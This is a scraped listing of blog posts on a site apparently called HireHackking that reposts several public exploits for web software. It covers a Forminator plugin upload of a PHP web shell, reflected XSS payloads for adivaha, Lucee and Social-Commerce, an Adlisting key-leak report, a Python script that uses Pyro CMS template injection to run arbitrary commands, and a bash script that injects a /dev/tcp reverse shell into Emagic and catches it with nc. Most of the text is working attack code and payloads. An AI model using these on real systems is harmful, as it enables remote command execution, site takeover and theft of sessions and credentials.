    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution # Date: 2023-07-20 # Exploit Author: Mehmet Kelepçe # Vendor Homepage: https://wpmudev.com/project/forminator-pro/ # Software Link: https://wordpress.org/plugins/forminator/ # Version: 1.24.6 # Tested on: PHP - Mysql - Apache2 - Windows 11 HTTP Request and vulnerable parameter: ------------------------------------------------------------------------- POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 1756 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTmsFfkbegmAjomne X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR Connection: close . . . . . ------WebKitFormBoundaryTmsFfkbegmAjomne Content-Disposition: form-data; name="postdata-1-post-image"; filename="mehmet.php" Content-Type: application/octet-stream <?php $_GET['function']($_GET['cmd']); ?> Source Code: wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php: -------------------------------------------------------------------- public function has_upload() { $fields = $this->get_fields(); if ( ! empty( $fields ) ) { foreach ( $fields as $field ) { if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) { return true; } } } return false; } Vulnerable parameter: postdata-1-post-image and Source code: wp-content/plugins/forminator/library/fields/postdata.php: ------------------------------------------------------------------- if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) { if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty( $_FILES[ $image_field_name ]['name'] ) ) { $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] ); $valid = wp_check_filetype( $file_name ); if ( false === $valid['ext'] || ! in_array( $valid['ext'], $this->image_extensions ) ) { $this->validation_message[ $image_field_name ] = apply_filters( 'forminator_postdata_field_post_image_nr_validation_message', esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ), $id ); } } } Vulnerable function: $image_field_name ------------------------------------------------------------------------- Payload file: mehmet.php <?php $_GET['function']($_GET['cmd']); ?> -------------------------------------------------------------------------
  20. HireHackking

    WordPress adivaha Travel Plugin 2.3 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /mobile-app/v3/ GET parameter 'isMobile' is vulnerable to XSS https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS] XSS Payload: clq95"><script>alert(1)</script>lb1ra [-] Done
  21. HireHackking

    Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure # Exploit Author: CraCkEr # Date: 25/07/2023 # Vendor: Templatecookie # Vendor Homepage: https://templatecookie.com/ # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script # Version: 2.14.0 # Tested on: Windows 10 Pro # Impact: Sensitive Information Leakage # CVE: CVE-2023-4168 ## Description Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. ## Steps to Reproduce: When you visit any page on the website, like: https://website/ad-list?category=electronics https://website/ad-list-search?page=2 https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword= in the body page response there's information leakage for +---------------------+ google_map_key api_key auth_domain project_id storage_bucket messaging_sender_id app_id measurement_id +---------------------+ Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel. Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path: https://website/push-notification (Login as Administrator) [-] Done
  22. HireHackking

    Lucee 5.4.2.17 - Authenticated Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS # Google Dork: NA # Date: 05/08/2023 # Exploit Author: Yehia Elghaly # Vendor Homepage: https://www.lucee.org/ # Software Link: https://download.lucee.org/ # Version: << 5.4.2.17 # Tested on: Windows 10 # CVE: N/A Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java. Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials. The payload: ?msg=<img src=xss onerror=alert('xssya')> http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1 Host: 172.16.110.130:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://172.16.110.130:8888 Connection: close Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview Upgrade-Insecure-Requests: 1 name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit [Affected Component] Debugging-->Template Service --> Search Services --> Event Gateway Service --> Logging
  23. HireHackking

    Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Date: 03/08/2023 # Vendor: https://pyrocms.com/ # Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation # Vulnerable Version(s): 3.9 # CVE: CVE-2023-29689 # Notes: You need a user who has access to /admin privilege # Example Usage: # First, run the script: python3 CVE-2023-29689.py # Please follow these steps: # 1. Enter the application URL: http://localhost:8000 # 2. Enter the email for authentication: admin@adm.com # 3. Enter the password: Admin@@2023 # 4. Enter the command to be executed: id # Result of command execution: # uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake) import requests from bs4 import BeautifulSoup from urllib.parse import urljoin def login(session, url, email, password): login_url = urljoin(url, '/admin/login') response = session.get(login_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'email': email, 'password': password } session.post(login_url, data=payload) # Function to edit role 1 and extract the Description of the Admin user. def edit_role_and_extract_description(session, url, command): edit_role_url = urljoin(url, '/admin/users/roles/edit/1') response = session.get(edit_role_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'name_en': 'Admin', 'slug': 'admin', 'description_en': f'{{{{["{command}"]|map("system")|join}}}}', 'action': 'save_exit' } session.post(edit_role_url, data=payload) # Extract the updated Description from role 1. response = session.get(urljoin(url, '/admin/users/roles')) soup = BeautifulSoup(response.content, 'html.parser') description = soup.find('td', {'data-title': 'Description'}).text.strip() return description def main(): url = input("Enter the application URL: ") email = input("Enter the email for authentication: ") password = input("Enter the password : ") command = input("Enter the command to be executed: ") with requests.Session() as session: login(session, url, email, password) description = edit_role_and_extract_description(session, url, command) print("\nResult of command execution:") print(description) if __name__ == "__main__": main()
  24. HireHackking

    Emagic Data Center Management Suite v6.0 - OS Command Injection

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection # Date: 03-08-2023 # Exploit Author: Shubham Pandey & thewhiteh4t # Vendor Homepage: https://www.esds.co.in/enlight360 # Version: 6.0.0 # Tested on: Kali Linux # CVE : CVE-2023-37569 URL=$1 LHOST=$2 LPORT=$3 echo "*****************************" echo "* ESDS eMagic 6.0.0 RCE *" echo "* > CVE-2023-37569 *" echo "* > Shubham & thewhiteh4t *" echo "*****************************" if [ $# -lt 3 ]; then echo """ USAGE : ./exploit.sh http://<IP> <LHOST> <LPORT> ./exploit.sh http://192.168.0.10 192.168.0.20 1337 """ exit 1 fi url="$1/index.php/monitor/operations/utilities/" echo "[+] URL : $URL" echo "[+] LHOST : $LHOST" echo "[+] LPORT : $LPORT" echo payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27" post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846" echo "[!] Triggering exploit..." echo $url (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) & echo "[+] Catching shell..." nc -lvp 4444
  25. HireHackking

    Social-Commerce 3.1.6 - Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Social-Commerce 3.1.6 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moosocial.com/ # Software Link: https://social-commerce.moosocial.com/ # Version: 3.1.6 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4174 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /search/index GET parameter 'q' is vulnerable to XSS https://website/search/index?q=[XSS] URL path folder [1,2] is vulnerable to XSS https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent https://website/user_info[XSS]/index/friends https://website/user_info/index[XSS]/friends https://website/faqs[XSS]/index?content_search= https://website/faqs/index[XSS]?content_search= XSS Payloads: j8chn"><img src=a onerror=alert(1)>ridxm [-] Done